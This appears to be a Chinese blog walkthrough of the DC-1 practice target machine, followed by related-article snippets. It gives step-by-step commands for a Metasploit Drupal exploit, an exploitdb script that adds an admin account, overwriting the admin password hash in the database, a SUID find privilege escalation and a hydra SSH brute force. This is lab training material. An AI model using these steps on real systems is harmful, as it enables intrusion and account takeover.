DC-1 靶机渗透测试(拿shell,提权)

已于 2022-03-17 12:24:47 修改
阅读量5.3k 收藏 20
点赞数 4
分类专栏: DC靶机-渗透测试 文章标签: 安全 web安全
于 2022-03-17 02:04:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/single_g_l/article/details/123539405
版权

目录

一. 环境

二. 信息收集

1. 主机发现

2.访问 192.168.1.184:80

三. 利用msfconsole 攻击(拿到flag1)

1. 漏洞利用成功

2. 进入会话 ,拿到flag1.txt  ---shell

​ 四. 找到配置文件,获取flag2

 五. 修改管理员密码,登录网站,拿到flag3

1. 获取交互式shell, 执行MySQL语句

 2. 查看管理员用户

 3. 修改管理员密码

 六. 用find语句,找到flag4

七. SUID提权,获取最后的flag

一. 环境

靶机:192.168.1.184

攻击机kali:192.168.1.98

(l网络配置都是NAT模式)

----开始---渗透

二. 信息收集

1. 主机发现

1. nmap -sP 192.168.1.0/24  或  arp-scan -l    #识别目标主机

2. nmap -sn 192.168.1.0/24 或者 nmap -sP 192.168.1.0/24  #主机发现/主机探测 

3. nmap -sS -A -p- 192.168.1.184  #识别目标主机服务,端口

  -A 全面系统检测、启用脚本检测、扫描等
  -sS 半开扫描,很少有系统能把它记入系统日志。不过,需要Root权限

发现了靶机IP 192.168.1.184 及 80端口开放 

2.访问 192.168.1.184:80

发现网站是Drupal(CMS+PHP)搭建的,使用的是Drupal 7版本

三. 利用msfconsole 攻击(拿到flag1)

1. 漏洞利用成功

1. search drupal  #查找drupal的漏洞

2. use 2     #利用第2个龙洞

3. show options   #显示详情

4. set rhosts 192.168.1.184 # 设置靶机地址

5. run 或 exploit  # 开始攻击

  攻击成功后

6. pwd   # 查看当前路径

2. 进入会话 ,拿到flag1.txt  ---shell

四. 找到配置文件,获取flag2

根据提示:Every good CMS needs a config file - and so do you.

                 每一个好的CMS都需要一个配置文件——你也一样。  

 五. 修改管理员密码,登录网站,拿到flag3

1. 获取交互式shell, 执行MySQL语句

flag2提示:最好不要用暴力破解、数据库账号密码

操作发现账号密码无法直接登录mysql,利用netstat -ano    #查看端口情况 ,查看到3306端口只允许本地访问,而3306是mysql的默认端口,由此判断我们要获取一个交互式shell,目的是为了进入数据库,执行mysql语句

netstat -ano    #查看端口情况 

python -c 'import pty;pty.spawn("/bin/bash")'   #获取交互式shell,使其可执行MySQL语句

mysql -udbuser -pR0ck3t    #登录MySQL

 2. 查看管理员用户

show databases;  #显示所有数据库

use drupaldb;    #选择当前数据库为dr库

show tables;     #显示所以数据表

select * from users;   #显示users表中所有内容,查找管理员账户

 3. 修改管理员密码

方法1: 增加一个管理员

 查看Drupal版本,确定Drupal版本为7.24;在exploitdb中有一个针对Drupal 7版本的攻击脚本,可以增加一个admin权限的用户账号

cat /var/www/includes/bootstrap.inc | grep VERSION  #查看版本信息
searchsploit drupal #查看该版本drupal
python /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.226.131 -u admin2  -p  admin2   #增加管理员用户

方法2: 用drupal的加密脚本加密,脚本在根目录下的scripts

重新进入交互式shell,然后两段cd回到根目录,然后获得hash码

1. python -c 'import pty; pty.spawn("/bin/bash")'  #重新取得交互式shell
2. php scripts/password-hash.sh admin1   #后面你设置的密码
  
重新进入数据库改密码
3. mysql -udbuser -pR0ck3t  #重新进入MYSQL
4. use drupaldb;  进入数据库
5. update drupaldb.users set pass="$S$DaBKN3LqPTjspZv34JYfbOIBtOZ1RMylzsAADoObNQHiPyYGu8kc" where name="admin";
6. <spZv34JYfbOIBtOZ1RMylzsAADoObNQHiPyYGu8kc" where name="admin"; 

注意: pass后面跟你的加密密码明文,第二段为$后第十二个字开始输

 登录账号 admin 密码 admin1,找到flag3

 六. 用find语句,找到flag4

find / | grep "flag*"

 上面用find 过滤出flag 可以直接找到flag4文件;下面是查找到find有特殊权限(是不是有点晕乎了,那就跳过这个。。)

 查看是否有sgid位的可执行文件(0输入,1标准输出,2错误输出)

find / –perm /4000 –print 2>/dev/null

#找特殊执行权限的文件,将错误输出到/dev/null下,/dev/null相当于linux中无底的垃圾桶

七. SUID提权,获取最后的flag

 falg4提示:Can you use this same method to find or access the flag in root?

1. find shell  -exec "/bin/sh" \;   #提权 (当前目录有shell文件)
    或者  find / -name shell -exec "/bin/sh" \; 
          name指定shell文件也可以touch自己创一个,/bin/sh调用shell
2. whoami #查看权限
3. cd /root #进入root
4. ls #列出文件
5. cat thefinalflag.txt #查看

再加一点: 我觉得到上面那步就已经结束了,下面的应该是提升权限详解

已知22端口发放,查看etc/shadow和/etc/passwd文件,发现Flag4用户可以hydra爆破一下

hydra -l flag4 -P ssh.txt      爆破成功(-P 后面是自定义爆破字典)Flag4   密码:orange

ssh flag4@172.16.43.140   登录flag4用户,进去之后,发现是“$”,而不是“#”,没有权限

find/ -perm -4000 2>/dev/null  检查SUID标识

find ./ aaa -exec '/bin/sh' \;   利用find提权,拿到root权限

小小丸子551
关注
专栏目录
模拟渗透测试——使用metasploit与wget获取靶机shell
mirocky的博客
01-19 1564
前言 近日在复现漏洞时,由于目标所提供的服务的某段代码没有对权限进行检查,导致了远程命令执行——RCE漏洞。 由于该漏洞本身的特性,所能执行的命令是需要通过url进行拼接且每次只可执行一句,因此尝试获取靶机shell来做到更多的事。 但在尝试的过程发现目标对于防渗透措施做的相当不错,删除或者禁用了很多命令,上篇文章(《反弹shell常用命令》)所提到的所有方式都没有尝试成功。但天无绝人之路,busyboxwget的身影吸引了我的注意。 环境准备 靶机:ubuntu 192.168.116.128 攻击
DC-1靶机渗透测试
weixin_45537612的博客
01-13 570
前奏:联网 自己刚安装的kali竟然没网,在花费了不少时间团团转后,用了下面的方法得以解决 出处: kali2020 永久性网络配置 (1)在VMware里打开kali linux和DC-1靶机 (2)打开终端通过su切换到root用户 (3)用ip add查看kali ip:192.168.153.129 (4)运用nmap扫描192.168.153.0/24以获取靶机IP 扫描出靶机 IP:192.168.153.130 用nmap -sV -p- 192.168.153.130扫描开放的端口
DC-1靶机搭建与渗透过程
最新发布
qq_63034068的博客
07-16 484
我们可以利用python实现互交shell,这样就好看一点,使用的前提是攻击主机上必须装有python。所以我们的靶机DC-1的ip为192.168.201.140。这里我们看到它的80端口是打开的,于是我们去访问这个服务器。我们用123456的hash将admin的给覆盖掉。我们看到了flag2的文件以及数据库的相关信息。我们随便看一看发现里面有一个flag3的文件。发现没有于是我们去找Drupal的配置文件。我们利用hash将admin的密码给修改掉。我们看到一个flag的文件我们打开看一看。
Veil生成免杀payload 渗透win10 获取靶机shell
qq_50854662的博客
03-31 659
一:实验环境 两台机器处于同网段 攻击机:kali 192.168.115.134  靶机:win10 192.168.115.1 二:Veil下载、安装、使用 kali里默认没有安装Veil,我们通过命令行安装: apt-get update && apt-get install veil 安装过程有点漫长,如果用的国内源可能会快点。 安装完成后启动V...
msf获取靶机shell进行远控
xiao_he0123的博客
01-25 4129
思路:msf制作exe木马文件靶机通过点击开启后门 原理:靶机执行木马文件后,向本机(你运行msf的主机)发送信息,本机打开监听状态,收到信息后进行操作 前提:知道主机IP(命令行输入ifconfig) (1)msf制作木马 输入命令行生成木马exe并保存在var/www/html文件,这样靶机就可以直接从网页下载木马 命令行参数意义: 然后开启apache服务: (2)靶机下载运行木马本机进行监听 靶机在浏览器输入192.168.40...
【Vulnhub靶机渗透测试】之DC-1 (SUID提权
Pluto.的博客
12-27 876
文章目录Vulnhub靶机渗透测试DC-11. 信息收集2. 漏洞利用 Vulnhub靶机渗透测试 DC-1 环境搭建 靶机镜像下载地址:https://www.vulnhub.com/entry/dc-1,292/; 需要将靶机和kali攻击机放在同一个局域网里; kali的IP地址:192.168.40.131。 1. 信息收集 使用 nmap 扫描 192.168.40.0/24 网段存活主机 nmap -sP 192.168.40.0/24 简单分析可知,靶机ip为 192
渗透测试靶机DC-1
prettyX的博客
11-27 6698
GoGoGO!!! 这篇文章是看着大佬的文章,跟着复现,学习思路。一共5个flag,全部找到。 1、靶机名字:DC-1,很好找,这里不放链接了。 : ) 2、靶机下载后,我一开始是用VMware Workstation导入的.ova,然后Kali下想扫出DC-1的IP,扫不出来,看了文章的评论,然后安装VirtualBox,导入.ova(说实话,第一次用VirtualBox)。 ...
靶场实战】dc-1靶机 渗透测试
weixin_44023442的博客
04-05 1201
参考文章 DC-1 靶机安装及练习 一、搭建环境 搭建环境 下载地址:dc-1 加压后用VMware打开,配置网络适配器为NAT模式 注意:dc-1开机后会提示输入账号密码,这里可以不用管他。 开启kali虚拟机,同样的,配置网络适配器为NAT模式 测试环境 在kali终端输入:ifconfig,查看当前网段 可知,当前c段是 192.168.224.0 用nmap扫描整个c段,输入nmap -sP 192.168.224.0/24 很明显,192.168.224.129 就是dc-1的ip地址
VulnHub-DC-1靶机渗透测试和相应的知识点总结
qq_45584159的博客
12-15 1406
文章目录前言一、探测目标主机的ip1.使用arp-scan -l 命令,来探测同一局域网内的存活主机。2.使用netdiscover -i eth0二、使用namp扫描目标主机的开放端口,并通过开放端口得到更多的信息三. .Metasploit漏洞利用msf的简单使用:术语:模块:基础指令:模块使用规则:msf大多数命令:第一步.启动msf:第二步.搜索drupal可利用的漏洞第三步,采用最新的2018漏洞尝试攻击,配置参数第四步,反弹shell四. 进入数据库第一步.进入数据库 前言 这是我第一次使用
DC-9 靶机渗透
Rex_Surprise的博客
05-10 355
DC-9 靶机渗透 1. 渗透过程 THE_END! DC-9 靶机渗透1. 渗透过程 初期脚本扫描 扫描结果 可以发现 ip地址为:192.168.0.114 ssh (但是ssh无法访问了) 和 http服务s 但是没有其他可用的信息 爆破一下目录 我这里用御剑爆破 输入url: http://192.168.0.114...
渗透测试-getshell方法总结
Jian Sun_的博客
02-11 3225
一、管理员权限拿shell 需要有管理员权限才可以拿shell 通常需要登录后台执行相关操作 直接上传拿shell 国内多对上传类型进行了限制,需要在进行绕过操作 1、织梦cms后台为例子 进入后台 写入一个一句话木马 长传一个一句话木马 2、数据库备份拿shell 示例:南方数据 v7.0 良精通用企业网站管理系统 方法一: 1.先上一张图马,得到路径 2.选择数据库备份,将图马备份为a.asp 3.访问xxx/xxx/.../a.asp.
渗透综合靶场---SqlServer提权
q
12-22 1125
再次查询是否开启3389端口,已开启就使用mstsc连接----exec xp_cmdshell'netstat -ant | find "3389"'查看目标是否开启3389端口----exec xp_cmdshell'netstat -ant | find "3389"'如何找到上传的文件所在目录,使用burp抓包点击文件,然后修改文件名,然后再放包,浏览器因为找不到文件会报错。扫描端口,知道目标ip,扫描目标ip开启了多少端口,(1-65535) 扫描出下面端口。
linux 拿shell,linux下备份拿shell[渗透必备]
weixin_30682635的博客
05-14 1218
关于php包含Apache日志的利用,其实也就是利用提交的网址里有php语句,然后再被Apache服务器的日志记录,然后php再去包含执行,从而包含了去执行。当然,这种办法最大的弊端是Apache日志肯定会过大,回应的时候当然会超时什么的,所以也是受条件限制的。全当一种研究算了。下面是我的测试过程,我觉得很有意思,你也看看。比如说,在一个php存在包含漏洞就像这样,存在一句php包含漏洞的语句 i...
Stapler-1靶场详细教学(7种漏洞利用+5种提权
weixin_60374959的博客
12-30 3250
这个靶场令我收获颇深,因为这里利用到的一些手法已经算是实战的技术,同时这里使用了多种方法getshell,getsehll之后又展示了多方法提权,更多的开拓了我们的思维。我们这里总共用到了7种方法获取权限,5钟方式获取root权限,很大程度开阔了哦我们的思路,如果有别的方法的小伙伴欢迎提出建议哦。
靶机渗透测试实战(一)——拿下shell之后的操作、SUID的解释
weixin_45116657的博客
09-25 2978
理论基础: 1、使用arp-scan -l命令进行主机扫描,确定主机ip; arp-scan是一个用来进来系统发现和指纹识别的命令行工具。它可以构建并发送ARP请求到指定的IP地址,并且显示返回的任何响应。 arp-scan是Kali Linux自带的一款ARP扫描工具。该工具可以进行单一目标扫描,也可以进行批量扫描。批量扫描的时候,用户可以通过CIDR、地址范围或者列表文件的方式指定。该工具...
靶机渗透测试(CyberSploit: 1)
@小张小张的博客
10-12 2530
靶机渗透测试(CyberSploit: 1): Vulnhub靶机 CyberSploit: 1 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(Easy–Intermediate) 目标:拿下三个flag.txt 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 终端命令: netdiscover -i eth0 -r 192.168.10.0(网关) 得到靶机ip:192.168.10.7
记一次渗透进学弟服务器Getshell的过程
落日领航员の技术栈
09-06 1738
0x00 写在前面 首先说一句,我真的好久 好久 好久 好久 好久没碰过渗透了,一方面是因为太菜,之前从来都没完整的走完一套getshell,半路卡住是常有,做着做着就give up;另一方面是从实习以来一直做的是安全开发相关的工作,以后工作方向大概率也是安全开发而不是攻防。 那为什么我会忽然想起搞学弟的网站呢?事情是这样的,之前有指导过学弟怎么搭建一套作业提交系统,然后学弟就开始自己研究,间过了好久,我也忘了这码事。 今天晚上他忽然来找我 顺便问他要了网址,也想登上去看看是啥样 本来以为就是个简单的作
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程需要根据实际情况进行调整和优化。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值